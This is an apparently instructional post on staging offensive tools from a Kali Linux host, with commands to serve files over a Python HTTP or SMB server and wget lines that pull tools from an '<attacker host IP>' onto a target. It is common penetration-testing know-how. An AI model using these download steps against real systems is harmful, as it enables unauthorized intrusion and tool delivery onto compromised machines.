Staging Malware and Tools on Kali Linux

Kali Linux is a widely used penetration testing platform that comes with a huge list of pre-installed tools and resources ready to execute with minimal configuration. Additional tools and resources can also be obtained and installed on the distribution to perform specific tasks additional to the toolset that Kali Linux comes with.

A commonly encountered task when using Kali Linux or any other host being used for offensive security, is hosting capabilities that can be access via a target pre or post compromise. There are various methods that can be used when staging capabilities, which can be found on the MITRE ATT&CK Stage Capabilities page, however one of the easiest when conducting penetration tests or competing in CTF’s is to host a collection of tools on a Web Server or SMB share.

Python HTTP Server

To stage tools via a Python HTTP Web Server, the following Python command can be executed on the attacking Kali Linux host. Once executed, remote hosts should be able to access the directory containing the tools held within by navigating to the attacking hose using the IP and Port configured.

# Attacker Host - Set port and directory to where tools are located on the localhost
python3 -m http.server <port> --directory /path/to/tools

# Target Host
(Windows) powershell wget http://<attacker host IP>:<port>/<tool name>
(Linux) wget http://<attacker host IP>:<port>/<tool name>

Python SMB Server

Staging tools can also be performed using an SMB share by executing the following command. SMB is a common protocol found in Windows environments; this method being better suited for hosting tools internally. Once enabled, the target host can navigate to the SMB share to access the tools.

# Attacker Host - Set directory to where tools are located on the localhost and credentials
python3 smbserver.py SHARE /path/to/tools -smb2 -username <user> -password <pass>